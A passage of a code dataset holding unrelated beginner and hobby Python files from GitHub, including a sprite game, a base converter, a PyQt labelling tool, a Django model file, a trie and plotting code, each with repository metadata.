Pan(games.Sprite):\n\t\"\"\"Перемещение руки\"\"\"\n\timage=games.load_image(\"hands_main.png\")\n\n\tdef __init__(self):\n\t\t\"\"\"Инициализация Рук и отображения счета\"\"\"\n\t\tsuper(Pan, self).__init__(image=Pan.image,\n\t\t\t\t\t\t\t\t\tx=games.mouse.x,\n\t\t\t\t\t\t\t\t\tbottom=games.screen.height)\n\t\tself.score=games.Text(value=0,size=45,color=color.black,\n\t\t\t\t\t\t\t\t\ttop=5, right=games.screen.width-10)\n\t\tgames.screen.add(self.score)\n\n\tdef update(self):\n\t\t\"\"\"Перемещает обьект в по горизонтали\"\"\"\n\t\tself.x=games.mouse.x\n\t\tif self.left<0:\n\t\t\tself.left=0\n\t\tif self.right>games.screen.width:\n\t\t\tself.right=games.screen.width\n\t\tself.check_catch()\n\tdef check_catch(self):\n\t\t\"\"\"Проверка словили ли мяч\"\"\"\n\t\tfor bool in self.overlapping_sprites:\n\t\t\tself.score.value+=10\n\t\t\tself.score.right=games.screen.width-10\n\t\t\tbool.handle_caught()\n\nclass Bool(games.Sprite):\n\t\"\"\"Мячи падающие на землю\"\"\"\n\timage=games.load_image(\"myach2.png\")\n\tspeed=1\n\n\tdef __init__(self, x, y=90):\n\t\t\"\"\"Инициализация обьекта мяч\"\"\"\n\t\tsuper(Bool, self).__init__(image=Bool.image,\n\t\t\t\t\t\t\t\t\tx=x, y=y,\n\t\t\t\t\t\t\t\t\tdy=Bool.speed)\n\tdef update(self):\n\t\t\"\"\"Проверка не коснулась ли границы экрана спрайт\"\"\"\n\t\tif self.bottom >games.screen.height:\n\t\t\tself.end_game()\n\t\t\tself.destroy()\n\n\tdef handle_caught(self):\n\t\t\"\"\"Разрушает обьект пойманным игроком\"\"\"\n\t\tself.destroy()\n\n\tdef end_game(self):\n\t\t\"\"\"Завершение игры\"\"\"\n\t\tend_message=games.Message(value=\"Game Over\",\n\t\t\t\t\t\t\t\t\tsize=90,\n\t\t\t\t\t\t\t\t\tcolor=color.red,\n\t\t\t\t\t\t\t\t\tx=games.screen.width/2,\n\t\t\t\t\t\t\t\t\ty=games.screen.height/2,\n\t\t\t\t\t\t\t\t\tlifetime=5*games.screen.fps,\n\t\t\t\t\t\t\t\t\tafter_death=games.screen.quit)\n\t\tgames.screen.add(end_message)\nclass Hero(games.Sprite):\n\t\"\"\"Герой который бросает мяч\"\"\"\n\timage=games.load_image(\"hero.png\")\n\n\tdef __init__(self, y=55, speed=2, adds_change=200):\n\t\t\"\"\"Инициализация Героя\"\"\"\n\t\tsuper(Hero, self).__init__(image=Hero.image,\n\t\t\t\t\t\t\t\t\tx=games.screen.width/2,\n\t\t\t\t\t\t\t\t\ty=y,\n\t\t\t\t\t\t\t\t\tdx=speed)\n\t\tself.adds_change=adds_change\n\t\tself.time_til_drop=0\n\n\tdef update(self):\n\t\t\"\"\"Определяет надо ли менять направление\"\"\"\n\t\tif self.left<0 or self.right>games.screen.width:\n\t\t\tself.dx=-self.dx\n\t\telif random.randrange(self.adds_change)==0:\n\t\t\tself.dx=-self.dx\n\t\tself.check_drop()\n\n\tdef check_drop(self):\n\t\t\"\"\"Уменьшение интервала ожидания и сбрасывание мяча\"\"\"\n\t\tif self.time_til_drop>0:\n\t\t\tself.time_til_drop -=1\n\t\telse:\n\t\t\tnew_bool=Bool(x=self.x)\n\t\t\tgames.screen.add(new_bool)\n\t\t\tself.time_til_drop=int(new_bool.height*1.3/Bool.speed)+1\n\n\n\n\ndef main():\n\twall_image=games.load_image(\"wall21.jpg\",transparent=False)\n\tgames.screen.background=wall_image\n\n\tthe_hero=Hero()\n\tgames.screen.add(the_hero)\n\n\tthe_pan=Pan()\n\tgames.screen.add(the_pan)\n\n\tgames.mouse.is_visible=False\n\tgames.screen.event_grab=True\n\n\n\tgames.screen.mainloop()\n\n#start\n\nmain()\n","repo_name":"matedim/python","sub_path":"bool_panic.py","file_name":"bool_panic.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34637986024","text":"import math\n\n#from Tools.i18n.pygettext import safe_eval\n\nn, m = map(int, input().split())\nmain_lis = 
[]\nlis = []\ncount_lst = []\ncords = []\n\nfor i in range(n):\n lis = [list(i) for i in input().split()]\n main_lis.append(lis[0])\n#print(main_lis)\n\n\ndef check(i, j, incr=1,count=0):\n try:\n if i - incr < 0 or j-incr < 0 or main_lis[i-incr][j] == 'X' or main_lis[i][j+incr] == 'X' or main_lis[i+incr][j] == 'X' or main_lis[i][j-incr] == 'X':\n raise IndexError\n else:\n #print('indide')\n if main_lis[i-incr][j] == 'G' and main_lis[i][j+incr] == 'G' and main_lis[i+incr][j] == 'G' and main_lis[i][j-incr] == 'G':\n #print('insode')\n count += 4\n incr += 1\n check(i, j, incr,count)\n except IndexError as e:\n if count != 0:\n count_lst.append(count)\n temp = [i, j]\n cords.append(temp)\n\ndef first_time():\n for i in range(n):\n for j in range(m):\n if i == 0 or i == n-1 or j==0 or j==m-1:\n pass\n else:\n if main_lis[i][j] == 'G':\n print('found at ', i, j)\n check(i,j)\n\n\n\n\ndef marked(i, j, incr=1, count=0):\n global main_lis\n try:\n if i - incr < 0 or j-incr < 0 :\n raise IndexError\n else:\n print('in marking')\n if main_lis[i-incr][j] == 'G' and main_lis[i][j+incr] == 'G' and main_lis[i+incr][j] == 'G' and main_lis[i][j-incr] == 'G':\n main_lis[i][j] = 'X'\n main_lis[i - incr][j] = 'X'\n main_lis[i][j + incr] = 'X'\n main_lis[i + incr][j] = 'X'\n main_lis[i][j - incr] = 'X'\n print('marked ',i,j)\n count += 1\n incr += 1\n marked(i, j, incr,count)\n except IndexError as e:\n print('marked list is',main_lis)\n\n\nfirst_time()\nprint(count_lst)\nprint(cords)\n\n#copy = main_lis.copy()\ncopy = [i for i in main_lis]\nprint('mai list ais',copy)\n#copyCount = count_lst.copy()\ncopyCount = [i for i in count_lst]\n#copyCords = cords.copy()\ncopyCords = [i for i in cords]\nsecondLs= []\n\n'''\nprint(count_lst)\nprint(cords)\nprint(len(count_lst))\nprint(len(cords))\nprint(max(count_lst))\nmax_cords = cords[count_lst.index(max(count_lst))]\nprint(max_cords)\nfirst = max(count_lst)+1\nprint('first value is {}'.format(first))\n'''\n\nprint(copyCords)\nfor p in copyCords:\n print(p[0],p[1])\n marked(p[0],p[1])\n print('main list is',main_lis)\n print('copy list is',copy)\n #main_lis = copy.copy()\n main_lis = [i for i in copy]\n #print(main_lis)\n\nprint('secondlists are')\nprint(secondLs)\n\n'''\nmarked(max_cords[0], max_cords[1])\n\nprint(main_lis)\n\ncount_lst.clear()\ncords.clear()\n\nfirst_time()\nprint('lst is')\nprint(count_lst)\nprint(cords)\nprint(len(cords))\nif len(count_lst) == 0:\n second = 1\nelse:\n second = max(count_lst)+1\nprint('second value is {}'.format(second))\n\n\nprint('final val is {}'.format(first*second))\n'''\n","repo_name":"ardnahcivar/Python","sub_path":"Learning python/ema_supercomp.py","file_name":"ema_supercomp.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3122960150","text":"from bank import CheckingAccount\n\nid_1 = CheckingAccount(\"Jane\", \"Doe\")\n\ndef main():\n is_running = True\n while is_running == True:\n menu = input(\"Hello {} {}. Pick one of the following: (1) Make a deposit. (2) Withdraw money. (3) Check balance. (4) View Transactions. (5) Quit. 
\".format(id_1.first_name,id_1.last_name))\n print(menu)\n\n if menu == '1':\n deposit_amount = int(input(\"Enter the amount you would like to deposit: \"))\n print(\"You have deposited ${}.\".format(deposit_amount))\n id_1.deposit_money(deposit_amount)\n\n elif menu == '2':\n withdrawal_amount = int(input(\"Enter the amount you would like to withdraw: \"))\n print(\"You withdrew ${}.\".format(withdrawal_amount))\n id_1.make_withdrawal(withdrawal_amount)\n\n\n elif menu == '3':\n print(\"Your balance is ${}.\".format(id_1.get_balance()))\n\n elif menu == '4':\n print(id_1.get_transaction_history())\n\n elif menu == '5':\n is_running = False\n print(\"Goodbye {} {}. Your total deposits for this session were ${} and your total withdrawals for this session were ${}. The final balance in your account is ${}.\".format(id_1.first_name, id_1.last_name, id_1.deposit_total, id_1.withdrawal_total, id_1.balance))\n break\n\nmain()\n","repo_name":"ashleystieb/CodeGuildPDX","sub_path":"python/labs/bankaccount/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33981087951","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# num = int(input())\n# cont = 0\n# aux = num\n# resto = []\n# while aux > 0:\n# dig = aux % 16\n# aux = aux // 16\n \n# resto.append(dig)\n# if aux // 16 == 0:\n# aux = str(aux) # Transformando os valores em string.\n# dig = str(dig) # Transformando os valores em string.\n \n# if int(dig) > 9:\n# hex = aux + chr(int(dig) + 87) + str(resto[0]) # Transformando em hexadecimal com a conversão do num > 9.\n# print(hex)\n# break\n# else: # Se o valor < 9, imprime o hex normal.\n# hex = aux + dig\n# print(hex)\n# break\n\n# numero = int(input())\n# aux = numero\n# resto = []\n\n# while aux > 0:\n# dig = aux % 16\n# aux = aux // 16\n\n# resto.append(dig)\n# x = len(resto) - 1\n# resultado_hex = []\n\n# while (x >= 0):\n# resultado_hex.append(resto[x])\n# x = x -1\n\n# i = 0\n# while resto[i] // 16 == 0:\n\n\n\n# Decimais\ndef decimal_binario(numero):\n numero = int(numero)\n valor = ''\n resto = 0\n\n while True:\n resto = numero // 2\n aux = numero - (resto * 2)\n\n valor += str(aux)\n\n numero = numero // 2\n\n if numero <= 0:\n break\n print(valor[::-1], 'bin')\n\ndef decimal_hexa(numero):\n numero = int(numero)\n print(hex(numero)[2:], 'hex')\n\n# Bin\ndef binario_decimal(numero):\n numero = list(numero)\n valor = 0\n\n for i in numero:\n valor = valor * 2 + int(i)\n print(valor, 'dec')\ndef binario_hexa(numero):\n numero = list(numero)\n \n valor = 0\n\n for i in numero:\n valor = valor * 2 + int(i)\n \n print(hex(valor)[2:], 'hex')\n\n# HEXA\ndef hexa_decimal(numero):\n numero = int(numero, 16)\n\n print(numero, 'dec')\n\ndef hexa_binario(numero):\n numero = int(numero, 16)\n decimal_binario(numero)\n\nvezes = int(input())\n\nfor i in range(vezes):\n numero, base = input().split()\n print('Case %d:'%(i+1))\n\n if base == 'bin':\n binario_decimal(numero)\n binario_hexa(numero)\n\n elif base == 'dec':\n decimal_hexa(numero)\n decimal_binario(numero)\n \n elif base == 'hex':\n hexa_decimal(numero)\n hexa_binario(numero)\nprint()\nexit(0)","repo_name":"cl1sman/saberesPython","sub_path":"Courses/Alg-Prog/List/4/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31907603813","text":"import os\n\nfrom PyQt5.QtCore import 
Qt\nfrom PyQt5.QtWidgets import QComboBox, QListWidget\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QPushButton, QFileDialog, QStyleFactory, \\\n QVBoxLayout, \\\n QDesktopWidget\n\nfrom core.ComboCheckBox import ComboCheckBox\nfrom core.glwidget import GLWidget as gl_widget\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.display_point = QPushButton('显示点云')\n self.display_relations_list = QListWidget()\n self.save_relation = QPushButton('保存当前关系')\n self.clear_write_btn = QPushButton('删除所有关系')\n self.revert_last_state = QPushButton('撤销当前写入')\n self.choose_write_directory = QFileDialog()\n self.gl_widget = gl_widget(self)\n self.write_btn = QPushButton('写入当前关系')\n self.relation_text = QComboBox()\n self.display_btn = QPushButton('显示组合obb')\n self.choose_file = QPushButton('选取文件夹 ')\n self.label_box = ComboCheckBox()\n self.file_dialog = QFileDialog()\n self.file_dialog_write = QFileDialog()\n self.data = []\n self.fake_data = []\n self.use_fake = False\n self.init_ui()\n self.obbs_path = ''\n self.save_path = ''\n self.relation_stack = []\n self.display_all_relations()\n\n def init_ui(self):\n\n main_layout = QHBoxLayout()\n main_layout.addWidget(self.gl_widget)\n child_layout_h_1 = QHBoxLayout()\n child_layout_h_2 = QHBoxLayout()\n child_layout_h_3 = QHBoxLayout()\n child_layout_v_1 = QVBoxLayout()\n\n # label choose\n self.label_box.show()\n self.label_box.fn_init_data(self.data)\n self.label_box.setMinimumContentsLength(15)\n self.label_box.setStyle(QStyleFactory.create('Windows'))\n self.label_box.currentIndexChanged.connect(lambda: self.on_click(self.label_box))\n\n # choose file dialog\n self.choose_file.toggle()\n self.choose_file.clicked.connect(lambda: self.on_click(self.choose_file))\n\n # display combined relations\n self.display_btn.toggle()\n self.display_btn.clicked.connect(lambda: self.on_click(self.display_btn))\n\n # 关系选择\n self.relation_text.addItems(['0: 邻接', '1:支撑', '2:环绕', '3:并列'])\n self.relation_text.currentIndexChanged.connect(lambda: self.on_click(self.relation_text))\n\n # 保存关系\n self.save_relation.toggle()\n self.save_relation.clicked.connect(lambda: self.on_click(self.save_relation))\n # 写入到txt\n self.write_btn.toggle()\n self.write_btn.clicked.connect(lambda: self.on_click(self.write_btn))\n # 删除当前所有关系\n self.clear_write_btn.toggle()\n self.clear_write_btn.clicked.connect(lambda: self.on_click(self.clear_write_btn))\n # 撤销前一个写入的关系\n self.revert_last_state.toggle()\n self.revert_last_state.clicked.connect(lambda: self.on_click(self.revert_last_state))\n # 显示所有关系\n self.display_relations_list.clicked.connect(lambda: self.on_click(self.display_relations_list))\n self.display_relations_list.currentItemChanged.connect(lambda: self.display_all_relations())\n # 显示点云\n self.display_point.toggle()\n self.display_point.clicked.connect(lambda: self.on_click(self.display_point))\n\n child_layout_h_1.addWidget(self.choose_file, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_1.addWidget(self.label_box, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_1.addWidget(self.display_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_h_2.addWidget(self.display_relations_list, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_2.addWidget(self.display_point, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_h_3.addWidget(self.relation_text, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.save_relation, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.write_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n 
child_layout_h_3.addWidget(self.revert_last_state, 0, Qt.AlignLeft | Qt.AlignTop)\n child_layout_h_3.addWidget(self.clear_write_btn, 0, Qt.AlignLeft | Qt.AlignTop)\n\n child_layout_v_1.addLayout(child_layout_h_1, 1)\n child_layout_v_1.addLayout(child_layout_h_2, 1)\n child_layout_v_1.addLayout(child_layout_h_3, 1)\n main_layout.addLayout(child_layout_v_1, 0)\n self.setLayout(main_layout)\n self.setWindowTitle(\"Label Tools\")\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def draw_multi_obb(self, index=None):\n if index:\n print('---draw_multi_obb', index)\n self.draw_labeled_box(index[0])\n else:\n checked_box = self.label_box.get_checked_box()\n print(checked_box)\n multi = []\n for j, checked_index in enumerate(checked_box):\n if self.use_fake:\n for i, d in enumerate(self.fake_data[checked_box[j]].split(',')):\n multi.append(int(d.split(':')[0]))\n else:\n for i, d in enumerate(self.data[checked_box[j]].split(',')):\n multi.append(int(d.split(':')[0]))\n self.draw_labeled_box(multi)\n\n # onclick event handler\n def on_click(self, widget):\n if widget == self.label_box:\n self.draw_labeled_box([widget.currentIndex()])\n if widget == self.choose_file:\n directory = self.file_dialog.getExistingDirectory(self, '选取文件夹', '')\n print(directory)\n self.obbs_path = directory\n self.change_obbs(directory)\n if widget == self.display_btn:\n self.draw_multi_obb()\n if widget == self.relation_text:\n index = widget.currentIndex()\n checked_index = self.label_box.get_checked_box()\n if checked_index:\n print(checked_index)\n # print(','.join(checked_index))\n print(str(checked_index), str(index))\n if widget == self.write_btn:\n self.write_txt()\n if widget == self.clear_write_btn:\n self.clear_txt()\n if widget == self.revert_last_state:\n self.back_stack()\n if widget == self.save_relation:\n self.write_single_relation()\n # 没生效\n if widget == self.display_relations_list:\n self.draw_multi_obb(self.relation_stack[self.display_relations_list.currentIndex()])\n if widget == self.display_point:\n self.display_all_point()\n\n # 删除\n def clear_txt(self):\n self.relation_stack = []\n if self.save_path != '':\n if os.path.isfile(self.save_path):\n os.remove(self.save_path)\n self.use_fake = False\n\n # 撤销\n def back_stack(self):\n print('back_stack', self.relation_stack)\n self.relation_stack.pop()\n if not self.relation_stack:\n self.use_fake = False\n self.display_all_relations()\n\n # 保存单个\n def write_single_relation(self):\n # 先压栈\n pair = self.label_box.get_checked_box()\n pair_temp = ''\n\n if self.use_fake:\n for i, p in enumerate(pair):\n for single in self.fake_data[p].split(','):\n print(single)\n pair_temp = pair_temp + '-' + single.split(':')[0]\n pair = pair_temp\n else:\n pair = '-'.join([str(x) for x in pair])\n if len(pair) >= 1:\n index = self.relation_text.currentIndex()\n if (pair, index) not in self.relation_stack:\n self.relation_stack.append((pair, index))\n self.display_all_relations()\n fake_data = []\n record = []\n # 现有的都是-a-b-c 组织起来的\n for (pair, index) in self.relation_stack:\n temp_list = []\n print(pair.split('-'))\n for p in pair.split('-'):\n if p != '':\n record.append(int(p))\n temp_list.append(self.data[int(p)])\n fake_data.append(','.join([str(x) for x in temp_list]))\n for i, d in enumerate(self.data):\n if i in record:\n pass\n else:\n fake_data.append(d)\n print(fake_data)\n self.fake_data = fake_data\n self.label_box.fn_init_data(self.fake_data)\n self.use_fake = True\n\n # 保存\n\n 
def write_txt(self):\n path = self.obbs_path\n file_name = path.split('/')[-1] + '_result.txt'\n print(path)\n print(file_name)\n directory = self.file_dialog_write.getExistingDirectory(self, '选取存储位置', '')\n print(directory)\n self.save_path = os.path.join(directory, file_name)\n with open(self.save_path, 'a+')as fp:\n for i, (index, relation) in enumerate(self.relation_stack):\n fp.write(','.join(str(x) for x in index) + ':' + str(relation) + \"\\n\")\n\n # 画出bbox\n def draw_labeled_box(self, index):\n self.gl_widget.repaint_with_data(index)\n\n # 更换 bbox\n def change_obbs(self, path):\n self.gl_widget.change_data(path)\n self.data = self.gl_widget.get_label_data()\n print(self.data)\n self.label_box.clear()\n self.label_box.fn_init_data(self.data)\n\n # 显示所有已保存的关系\n def display_all_relations(self):\n self.display_relations_list.clear()\n for relation in self.relation_stack:\n self.display_relations_list.addItem(str(relation))\n\n def display_all_point(self):\n self.gl_widget.display_point()\n","repo_name":"faultaddr/SceneLabel","sub_path":"core/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"17203036159","text":"\"\"\"empty message\r\n\r\nRevision ID: 2cebc5feb870\r\nRevises: a3fd1cedce97\r\nCreate Date: 2021-03-11 04:33:48.011133\r\n\r\n\"\"\"\r\nfrom alembic import op\r\nimport sqlalchemy as sa\r\n\r\n\r\n# revision identifiers, used by Alembic.\r\nrevision = '2cebc5feb870'\r\ndown_revision = 'a3fd1cedce97'\r\nbranch_labels = None\r\ndepends_on = None\r\n\r\n\r\ndef upgrade():\r\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('items',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=80), nullable=True),\n sa.Column('description', sa.String(length=100), nullable=True),\n sa.Column('unit', sa.String(length=80), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_table('Items')\n # ### end Alembic commands ###\r\n\r\n\r\ndef downgrade():\r\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('Items',\n sa.Column('id', sa.INTEGER(), server_default=sa.text('nextval(\\'\"Items_id_seq\"\\'::regclass)'), autoincrement=True, nullable=False),\n sa.Column('title', sa.VARCHAR(length=80), autoincrement=False, nullable=True),\n sa.Column('description', sa.VARCHAR(length=100), autoincrement=False, nullable=True),\n sa.Column('unit', sa.VARCHAR(length=80), autoincrement=False, nullable=True),\n sa.Column('price', sa.INTEGER(), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='Items_pkey')\n )\n op.drop_table('items')\n # ### end Alembic commands ###\r\n","repo_name":"Khenry784/7miles-","sub_path":"migrations/versions/2cebc5feb870_.py","file_name":"2cebc5feb870_.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73388985525","text":"# class Node:\n# def __init__(self) -> None:\n# self.key = None\n# self.value = None\n# self.children = {}\n\n\n# class Trie:\n# def __init__(self) -> None:\n# self.root = Node()\n\n# def insert(self, word, value):\n# currentWord = word\n# currentNode = self.root\n\n# while len(currentWord) > 0:\n# char = currentWord[0] # 1st character\n# if char in currentNode.children:\n# currentNode = currentNode.children[char] # move curr node forward\n# currentWord = currentWord[1:] # consider the remaining characters\n\n# else:\n# newNode = Node()\n# newNode.key = char\n\n# if len(currentWord) == 1:\n# newNode.value = value\n\n# currentNode.children[char] = newNode\n# currentNode = newNode\n# currentWord = currentWord[1:]\n\n# def lookup(self, word):\n# currentWord = word\n# currentNode = self.root\n\n# while len(currentWord) > 0:\n# char = currentWord[0] # 1st char\n\n# if char in currentNode.children:\n# currentNode = currentNode.children[char] # move node forward\n# print(currentNode.key, end=\"-->\")\n# currentWord = currentWord[1:]\n# else:\n# return \"Not in trie\"\n\n# if currentNode.value == None:\n# return \"None\"\n# return currentNode.value\n\n# def printAllNodes(self):\n# nodes = [self.root]\n# while len(nodes) > 0:\n# for letter in nodes[0].children:\n# nodes.append(nodes[0].children[letter])\n\n# return nodes\n\n\n# def makeTrie(words):\n# trie = Trie()\n# for word, value in words.items():\n# trie.insert(word, value)\n# return trie\n\n\n# trie = makeTrie({\"how\": 4, \"are\": 20, \"you\": 3})\n\n# print(trie.lookup(\"how\"))\n# print(trie.printAllNodes())\n\n\n# ------------------------------------------ #\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.end_of_word = False\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n current_node = self.root\n for char in word:\n if char not in current_node.children:\n current_node.children[char] = TrieNode()\n print(\"Current node:\", current_node.__str__())\n current_node = current_node.children[char]\n current_node.end_of_word = True\n\n def search(self, word):\n current_node = self.root\n for char in word:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n return current_node.end_of_word\n\n def starts_with(self, prefix):\n current_node = self.root\n for char in prefix:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n return True\n\n# Create a Trie object\ntrie = Trie()\n\n# Insert some words into the 
trie\ntrie.insert(\"apple\")\ntrie.insert(\"banana\")\ntrie.insert(\"pear\")\ntrie.insert(\"peach\")\n\n# Search for a word in the trie\nprint(trie.search(\"apple\")) # True\nprint(trie.search(\"grape\")) # False\n\n# Check if a word starts with a given prefix\nprint(trie.starts_with(\"pe\")) # True\nprint(trie.starts_with(\"gr\")) # False","repo_name":"Dipankar-Medhi/DSA-with-Python","sub_path":"Educative/trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29585372469","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Game(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tGameName = models.CharField(max_length=50)\n\turl = models.TextField()\n\n\nclass Conn(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tuserId = models.ForeignKey(User,on_delete=models.CASCADE)\n\tgameId = models.ForeignKey(Game,on_delete=models.CASCADE)\n\tscore = models.IntegerField()\n\nclass UserProfile(models.Model):\n\tid = models.AutoField(primary_key=True)\n\tuser = models.ForeignKey(User,on_delete=models.CASCADE,unique=True)\n\tprofile_image = models.ImageField(upload_to=\"profile_photos\", blank=True, null=True)\n","repo_name":"gjergjk71/gaming-platform","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32730480191","text":"import src.controller.api.google_maps_client as google_maps_client\nimport src.config as config\nimport pytest\n\n\ndef test_get_coordinates_invalid_location_results_in_error():\n \"\"\" Test that error is thrown when we the location given to the function is invalid \"\"\"\n\n with pytest.raises(AssertionError, match='Invalid location/address'):\n google_maps_client.get_coordinates(\"\")\n\ndef test_get_coordinates():\n \"\"\" Test valid coordinates are returned for a valid location \"\"\"\n\n if len(config.GMAP_API_KEY) > 0:\n expected_output = {'lat': 42.40483030000001, 'lng': -72.52925239999999}\n actual_output = google_maps_client.get_coordinates(\"1039 North Pleasant Street, Amherst, MA, USA\")\n assert actual_output == expected_output\n else:\n # skip assertion since API key is required to test above function\n assert 1 == 1","repo_name":"kavyaharlalka/kashikoi-elena-navigation","sub_path":"test/unit/test_google_maps_client.py","file_name":"test_google_maps_client.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24890359449","text":"print(\"---\"*20)\nprint(\" LOJA SUPER BARATÃO\")\nprint(\"---\"*20)\nsoma = quanti = quanti1 = 0\nwhile True:\n produto = str(input(\"Nome do Produto: \")).strip()\n preco = float(input(\"Preço: R$\"))\n soma += preco\n quanti += 1\n if quanti == 1:\n barato = preco\n bp = produto\n if barato > preco:\n barato = preco\n bp = produto\n if preco > 1000:\n quanti1 += 1\n resp = ' '\n while resp not in 'SN':\n resp = str(input(\"Quer continuar? 
[S/N] \")).upper().strip()[0]\n if resp == \"N\":\n break\nprint(\"----\"*5, \"FIM DO PROGRAMA\", \"----\"*5)\nprint(\"O total da compra foi R${:.2f}\".format(soma))\nprint(\"Temos {} produtos custando mais de R$1000.00\".format(quanti1))\nprint(\"O produto mais barato foi {} que custa R${:.2f}\".format(bp, barato))\n","repo_name":"ezequielfsilva/ProgramasPython","sub_path":"ex70.py","file_name":"ex70.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"317349328","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib; matplotlib.use('Agg')\nimport matplotlib.ticker as ticker\nparams = {\"mathtext.default\": \"regular\"}\nplt.rcParams.update(params)\n\n\ndef box(gpei_file, saas_file, name, rank_type='median', bold_nums=5):\n gpei = pd.read_csv(gpei_file)\n saas = pd.read_csv(saas_file)\n keys = list(gpei.columns)\n keys_nor = []\n for k in keys:\n gpei[k] = 1. / gpei[k]\n saas[k] = 1. / saas[k]\n items = k.split('_')\n if items[-1] == \"DoseLimit\":\n t = r'$\\mathrm{D^{it0}_{it1} dose}$'\n elif items[-1] == \"Priority\":\n t = r'$\\mathrm{D^{it0}_{it1} weight}$'\n t = t.replace(\"it0\", items[0])\n t = t.replace(\"it1\", items[1])\n t = t.replace('%', '\\%')\n print(k)\n keys_nor.append(t)\n\n gpei_max = gpei.median().max()\n saas_max = saas.median().max()\n\n # Normalize\n for k in keys:\n gpei[k] = gpei[k] / gpei_max\n saas[k] = saas[k] / saas_max\n\n gpei_mean = []\n saas_mean = []\n gpei_median = []\n saas_median = []\n gpei_std = []\n saas_std = []\n for k in keys:\n gpei_mean.append(gpei[k].mean())\n gpei_std.append(gpei[k].std())\n saas_mean.append(saas[k].mean())\n saas_std.append(saas[k].std())\n saas_median.append(saas[k].median())\n gpei_median.append(gpei[k].median())\n\n if rank_type == 'median':\n gpei_index = list(np.argsort(gpei_median))\n saas_index = list(np.argsort(saas_median))\n elif rank_type == 'mean':\n gpei_index = list(np.argsort(gpei_mean))\n saas_index = list(np.argsort(saas_mean))\n\n gpei_obj_rank = [keys_nor[i] for i in gpei_index]\n saas_obj_rank = [keys_nor[i] for i in saas_index]\n gpei_key_rank = [keys[i] for i in gpei_index]\n saas_key_rank = [keys[i] for i in saas_index]\n\n gpei_box = [list(gpei[k]) for k in gpei_key_rank]\n saas_box = [list(saas[k]) for k in saas_key_rank]\n\n for i in range(bold_nums):\n ind = len(saas_obj_rank) - i - 1\n saas_obj_rank[ind] = saas_obj_rank[ind].replace(\"mathrm\", \"mathbf\")\n j = gpei_index.index(saas_index[ind])\n gpei_obj_rank[j] = gpei_obj_rank[j].replace(\"mathrm\", \"mathbf\")\n\n fig, ax = plt.subplots(1, 2, constrained_layout=True, figsize=(25, 23))\n ax[1].boxplot(gpei_box, vert=False, showmeans=False, showfliers=False)\n ax[0].boxplot(saas_box, vert=False, showmeans=False, showfliers=False)\n ax[1].yaxis.set_major_formatter(ticker.FixedFormatter((gpei_obj_rank)))\n ax[0].yaxis.set_major_formatter(ticker.FixedFormatter((saas_obj_rank)))\n ax[1].set_yticklabels(gpei_obj_rank, fontsize=25)\n ax[0].set_yticklabels(saas_obj_rank, fontsize=25)\n ax[0].set_xticklabels([0.0, 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0], fontsize=25)\n ax[1].set_xticklabels([0.6, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4], fontsize=25)\n ax[0].set_xlabel('Relative Importance', fontsize=30)\n ax[1].set_xlabel('Relative Importance', fontsize=30)\n ax[1].set_title('GPEI', fontsize=40)\n ax[0].set_title('SAAS-BO', fontsize=40)\n 